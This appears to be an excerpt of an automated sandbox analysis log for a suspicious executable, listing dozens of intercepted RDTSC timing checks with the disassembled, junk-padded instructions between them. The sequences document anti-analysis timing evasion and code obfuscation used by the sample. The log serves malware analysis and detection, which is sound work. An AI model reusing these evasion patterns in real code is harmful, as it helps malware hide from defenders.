Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5EA944 second address: 5EA95C instructions: 0x00000000 rdtsc 0x00000002 je 00007F8124CF4598h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F8124CF4596h 0x00000012 jno 00007F8124CF4596h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5ED489 second address: 5ED490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5ED490 second address: 5ED4C0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8124CF4598h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8124CF45A2h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8124CF459Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5ED4C0 second address: 5ED4C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5ED4C4 second address: 5ED4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5ED4CA second address: 5ED4DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8124DF87C6h 0x0000000a jns 00007F8124DF87C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5ED4DA second address: 5ED4E4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8124CF4596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5F545A second address: 5F547B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8124DF87C6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8124DF87D4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5F547B second address: 5F548C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F8124CF45A2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5F548C second address: 5F5492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5F5492 second address: 5F5496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5F5788 second address: 5F578C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5F578C second address: 5F5792 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5F5792 second address: 5F57CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8124DF87D8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5F57CA second address: 5F57E9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F8124CF45A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5F57E9 second address: 5F57EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5F5ADF second address: 5F5B37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A0h 0x00000007 jmp 00007F8124CF45A8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jbe 00007F8124CF45A8h 0x00000015 pushad 0x00000016 jmp 00007F8124CF459Eh 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 6064F9 second address: 606503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8124DF87C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 60DD0D second address: 60DD13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 60AFB6 second address: 60AFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 60AFBC second address: 60AFC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 61B344 second address: 61B365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnp 00007F8124DF87C6h 0x0000000b jmp 00007F8124DF87D0h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 63340C second address: 633412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 633412 second address: 633418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 633574 second address: 633599 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F8124CF45B8h 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8124CF45A2h 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 6338A4 second address: 6338C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CBh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F8124DF87C6h 0x00000013 jg 00007F8124DF87C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 634076 second address: 63407A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 63407A second address: 63408C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 63408C second address: 634092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 634092 second address: 6340AE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8124DF87D7h 0x00000008 jmp 00007F8124DF87CFh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 63723A second address: 63729D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8124CF45A1h 0x00000008 jmp 00007F8124CF459Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edi 0x00000012 jc 00007F8124CF459Ch 0x00000018 jg 00007F8124CF4596h 0x0000001e pop edi 0x0000001f nop 0x00000020 mov dx, bx 0x00000023 push 00000004h 0x00000025 mov dh, 68h 0x00000027 call 00007F8124CF4599h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 jmp 00007F8124CF45A8h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 6375C9 second address: 6375F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8124DF87D9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 6375F3 second address: 6375F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 6375F7 second address: 637609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F8124DF87CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 637609 second address: 63760D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 63760D second address: 637639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jc 00007F8124DF87CAh 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8124DF87D2h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 637639 second address: 63766B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d je 00007F8124CF45B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8124CF45A8h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 63885A second address: 638860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 638860 second address: 638864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 63A010 second address: 63A02D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0CA3 second address: 4EF0D0B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8124CF45A2h 0x00000008 jmp 00007F8124CF45A5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ebx, 15E06DEEh 0x0000001a pushfd 0x0000001b jmp 00007F8124CF459Fh 0x00000020 sbb ecx, 0CBA2E9Eh 0x00000026 jmp 00007F8124CF45A9h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0D0B second address: 4EF0D11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0D11 second address: 4EF0D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0D15 second address: 4EF0D4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8124DF87D6h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F8124DF87D0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0D4C second address: 4EF0D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, dx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0D54 second address: 4EF0D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE0C00 second address: 4EE0C3C instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F8124CF45A7h 0x00000012 jmp 00007F8124CF45A3h 0x00000017 popfd 0x00000018 movzx esi, bx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE0C3C second address: 4EE0CA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 05E2479Dh 0x00000010 pushfd 0x00000011 jmp 00007F8124DF87CAh 0x00000016 add cx, C0F8h 0x0000001b jmp 00007F8124DF87CBh 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F8124DF87D4h 0x0000002b sub cx, 1B58h 0x00000030 jmp 00007F8124DF87CBh 0x00000035 popfd 0x00000036 movzx eax, dx 0x00000039 popad 0x0000003a pop ebp 0x0000003b pushad 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F209B3 second address: 4F209C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, EBh 0x00000005 mov di, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F209C5 second address: 4F209C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F209C9 second address: 4F209CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F209CD second address: 4F209D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F209D3 second address: 4F209E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8124CF459Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F209E3 second address: 4F20A0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F8124DF87D7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dh, B0h 0x00000015 push eax 0x00000016 pop edx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F20A0D second address: 4F20A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8124CF459Fh 0x00000009 or eax, 5FFE070Eh 0x0000000f jmp 00007F8124CF45A9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop ebp 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8124CF45A9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC00F7 second address: 4EC00FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC00FB second address: 4EC0101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC0101 second address: 4EC013F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 call 00007F8124DF87D6h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esp 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 movzx ecx, di 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007F8124DF87CCh 0x00000022 movzx eax, di 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC013F second address: 4EC0156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8124CF45A3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC0156 second address: 4EC015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC015A second address: 4EC01C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b call 00007F8124CF459Bh 0x00000010 pushfd 0x00000011 jmp 00007F8124CF45A8h 0x00000016 add cl, FFFFFFA8h 0x00000019 jmp 00007F8124CF459Bh 0x0000001e popfd 0x0000001f pop ecx 0x00000020 jmp 00007F8124CF45A9h 0x00000025 popad 0x00000026 push dword ptr [ebp+04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8124CF459Dh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE0573 second address: 4EE0579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE04D4 second address: 4EE050B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 25575CAEh 0x00000012 call 00007F8124CF459Fh 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE0201 second address: 4EE0273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8124DF87CFh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F8124DF87D9h 0x0000000f jmp 00007F8124DF87CBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a mov dx, cx 0x0000001d mov esi, 4EF4AD97h 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007F8124DF87CDh 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F8124DF87D8h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE0273 second address: 4EE0279 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE0279 second address: 4EE02CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 3403h 0x00000007 pushfd 0x00000008 jmp 00007F8124DF87D8h 0x0000000d add ah, FFFFFFC8h 0x00000010 jmp 00007F8124DF87CBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c movzx ecx, dx 0x0000001f mov esi, ebx 0x00000021 popad 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F8124DF87D5h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE02CE second address: 4EE02E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE0F39 second address: 4EE0F67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8124DF87CEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bx, 4DF4h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE0F67 second address: 4EE0F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE0F6B second address: 4EE0F7C instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, edi 0x0000000e push edi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F2085E second address: 4F20862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F20862 second address: 4F20868 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F20868 second address: 4F208AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 12B516ABh 0x00000010 pushfd 0x00000011 jmp 00007F8124CF45A0h 0x00000016 sub ch, 00000038h 0x00000019 jmp 00007F8124CF459Bh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov si, C067h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F208AB second address: 4F208E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F8124DF87D4h 0x0000000f sbb ecx, 2756E5C8h 0x00000015 jmp 00007F8124DF87CBh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d mov dx, cx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F208E0 second address: 4F20940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ebp, esp 0x00000007 pushad 0x00000008 call 00007F8124CF459Dh 0x0000000d mov ax, AC27h 0x00000011 pop ecx 0x00000012 mov edx, 3FD69440h 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F8124CF45A0h 0x00000022 sbb ax, 9A88h 0x00000027 jmp 00007F8124CF459Bh 0x0000002c popfd 0x0000002d call 00007F8124CF45A8h 0x00000032 pop eax 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F00151 second address: 4F0016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8124DF87D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F0016C second address: 4F00195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b jmp 00007F8124CF45A5h 0x00000010 and dword ptr [eax], 00000000h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov bx, cx 0x00000019 rdtsc
